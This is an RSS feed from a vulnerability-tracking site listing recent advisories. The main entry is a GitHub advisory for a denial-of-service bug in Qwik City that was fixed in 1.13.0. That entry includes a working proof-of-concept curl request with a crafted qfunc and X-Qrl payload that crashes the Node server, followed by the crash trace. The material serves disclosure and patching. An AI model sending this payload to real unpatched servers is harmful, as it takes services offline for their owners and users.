<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 20:11:13 +0000</lastBuildDate>
    <item>
      <title>bdu:2025-14615</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2025-14615</link>
      <description>bdu:2025-14615</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2025-14615</guid>
    </item>
    <item>
      <title>EUVD-2026-247134</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-247134</link>
      <description>EUVD-2026-247134</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-247134</guid>
    </item>
    <item>
      <title>fkie_cve-2025-53620</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2025-53620</link>
      <description>&lt;p&gt;@builder.io/qwik-city is the meta-framework for Qwik. When a Qwik Server Action QRL is executed it dynamically load the file containing the symbol. When an invalid qfunc is sent, the server does not handle the thrown error. The error then causes Node JS to exit. This vulnerability is fixed in 1.13.0.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;@builder.io/qwik-city is the meta-framework for Qwik. When a Qwik Server Action QRL is executed it dynamically load the file containing the symbol. When an invalid qfunc is sent, the server does not handle the thrown error. The error then causes Node JS to exit. This vulnerability is fixed in 1.13.0.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2025-53620</guid>
    </item>
    <item>
      <title>GHSA-qr9h-j6xg-2j72 — Qwik's unhandled exception vulnerabilty can cause server crashes from malicious requests</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-qr9h-j6xg-2j72</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: @builder.io/qwik-city&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;Possibility to craft a request that will crash the Qwik Server in the default configuration.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;When a Qwik Server Action QRL is executed it dynamically load the file containing the symbol. When an invalid qfunc is sent, the server does not handle the thrown error. The error then causes Node JS to exit.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;1. Setup a Qwik Project `pnpm create qwik@latest`
 2. Start the Qwik Server using `pnpm run preview`
 3. Execute the following curl command to crash the instance
```bash
curl --location &amp;#39;http://localhost:4173/?qfunc=PPXYallGsCE&amp;#39; \
--header &amp;#39;Content-Type: application/qwik-json&amp;#39; \
--header &amp;#39;X-Qrl: PPXYallGsCE&amp;#39; \
--data &amp;#39;{&amp;#34;_entry&amp;#34;:&amp;#34;2&amp;#34;,&amp;#34;_objs&amp;#34;:[&amp;#34;\u0002_#s_PPXYallGsCE&amp;#34;,1,[&amp;#34;0&amp;#34;,&amp;#34;1&amp;#34;]]}&amp;#39;
```&lt;/p&gt;
&lt;p&gt;Here the `qfunc` query parameter, `X-Qrl` header and payload need to have the same qrl.&lt;/p&gt;
&lt;p&gt;The Qwik Server will then crash with the message&lt;/p&gt;
&lt;p&gt;```
qrl s_PPXYallGsCE failed to load Error: Dynamic require of &amp;#34;_.js&amp;#34; is not supported
    at file:///home/michele/Code/qwik/server/entry.preview.js:32:199
    at Object.importSymbol (file:///home/michele/Code/qwik/server/entry.preview.js:32:776)
    at $ (file:///home/michele/Code/qwik/server/entry.preview.js:26:3064)
    at d (file:///home/michele/Code/qwik/server/entry.preview.js:26:3274)
    at file:///home/michele/Code/qwik/server/entry.preview.js:26:3311
    at Object.a (file:///home/michele/Code/qwik/server/entry.preview.js:26:2566)
    at oc (file:///home/michele/Code/qwik/server/entry.preview.js:16:1562)
    at proce…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: @builder.io/qwik-city&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;Possibility to craft a request that will crash the Qwik Server in the default configuration.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;When a Qwik Server Action QRL is executed it dynamically load the file containing the symbol. When an invalid qfunc is sent, the server does not handle the thrown error. The error then causes Node JS to exit.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;1. Setup a Qwik Project `pnpm create qwik@latest`
 2. Start the Qwik Server using `pnpm run preview`
 3. Execute the following curl command to crash the instance
```bash
curl --location &amp;#39;http://localhost:4173/?qfunc=PPXYallGsCE&amp;#39; \
--header &amp;#39;Content-Type: application/qwik-json&amp;#39; \
--header &amp;#39;X-Qrl: PPXYallGsCE&amp;#39; \
--data &amp;#39;{&amp;#34;_entry&amp;#34;:&amp;#34;2&amp;#34;,&amp;#34;_objs&amp;#34;:[&amp;#34;\u0002_#s_PPXYallGsCE&amp;#34;,1,[&amp;#34;0&amp;#34;,&amp;#34;1&amp;#34;]]}&amp;#39;
```&lt;/p&gt;
&lt;p&gt;Here the `qfunc` query parameter, `X-Qrl` header and payload need to have the same qrl.&lt;/p&gt;
&lt;p&gt;The Qwik Server will then crash with the message&lt;/p&gt;
&lt;p&gt;```
qrl s_PPXYallGsCE failed to load Error: Dynamic require of &amp;#34;_.js&amp;#34; is not supported
    at file:///home/michele/Code/qwik/server/entry.preview.js:32:199
    at Object.importSymbol (file:///home/michele/Code/qwik/server/entry.preview.js:32:776)
    at $ (file:///home/michele/Code/qwik/server/entry.preview.js:26:3064)
    at d (file:///home/michele/Code/qwik/server/entry.preview.js:26:3274)
    at file:///home/michele/Code/qwik/server/entry.preview.js:26:3311
    at Object.a (file:///home/michele/Code/qwik/server/entry.preview.js:26:2566)
    at oc (file:///home/michele/Code/qwik/server/entry.preview.js:16:1562)
    at proce…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-qr9h-j6xg-2j72</guid>
    </item>
  </channel>
</rss>
